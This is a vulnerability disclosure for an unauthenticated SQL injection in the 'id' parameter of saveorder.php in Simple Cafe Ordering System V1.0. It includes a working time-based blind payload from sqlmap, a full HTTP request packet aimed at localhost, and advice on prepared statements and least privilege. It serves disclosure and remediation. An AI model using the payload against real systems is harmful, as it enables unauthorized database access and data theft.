Code-projects Simple Cafe Ordering System V1.0 /saveorder.php SQL injection
NAME OF AFFECTED PRODUCT(S)
- Simple Cafe Ordering System
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
- A SQL injection vulnerability was identified within the "/saveorder.php" file of the "Simple Cafe Ordering System" project. The root cause lies in the fact that attackers can inject malicious code via the parameter "id". This input is then directly utilized in SQL queries without undergoing proper sanitization or validation processes. As a result, attackers are able to fabricate input values, manipulate SQL queries, and execute unauthorized operations.
Impact
- Exploiting this SQL injection vulnerability allows attackers to gain unauthorized access to the database, cause sensitive data leakage, tamper with data, gain complete control over the system, and even disrupt services. This poses a severe threat to both the security of the system and the continuity of business operations.
DESCRIPTION
- During the security assessment of "Simple Cafe Ordering System", I detected a critical SQL injection vulnerability in the "/saveorder.php" file. This vulnerability is attributed to the insufficient validation of user input for the "id" parameter. This inadequacy enables attackers to inject malicious SQL queries. Consequently, attackers can access the database without proper authorization, modify or delete data, and obtain sensitive information. Immediate corrective actions are essential to safeguard system security and uphold data integrity.
No login or authorization is required to exploit this vulnerability
Vulnerability details and POC
Vulnerability location:
Payload:
Parameter: id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=33&transcode=0taoh8x3&name=Pizza&id=2' AND (SELECT 5949 FROM (SELECT(SLEEP(5)))VIjk) AND 'brjv'='brjv&price=30.00&name=Pizza&quantity=1&butadd.x=15&butadd.y=10Vulnerability Request Packet
POST /CafeOrderingSystem_PHP/onlinecafe/saveorder.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 98
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="135", "Not-A.Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/CafeOrderingSystem_PHP/onlinecafe/portal.php?id=2
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=jfkp5j84b961954sqhb22l7nn1
Connection: keep-alive
id=33&transcode=0taoh8x3&name=Pizza&id=2&price=30.00&name=Pizza&quantity=1&butadd.x=15&butadd.y=10
The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
Suggested repair
- Employ prepared statements and parameter binding:
Prepared statements serve as an effective safeguard against SQL injection as they segregate SQL code from user input data. When using prepared statements, user - entered values are treated as mere data and will not be misconstrued as SQL code.
- Conduct input validation and filtering:
Rigorously validate and filter user input data to guarantee that it conforms to the expected format. This helps in blocking malicious input.
- Minimize database user permissions:
Ensure that the account used to connect to the database has only the minimum required permissions. Avoid using accounts with elevated privileges (such as 'root' or 'admin') for day - to - day operations.
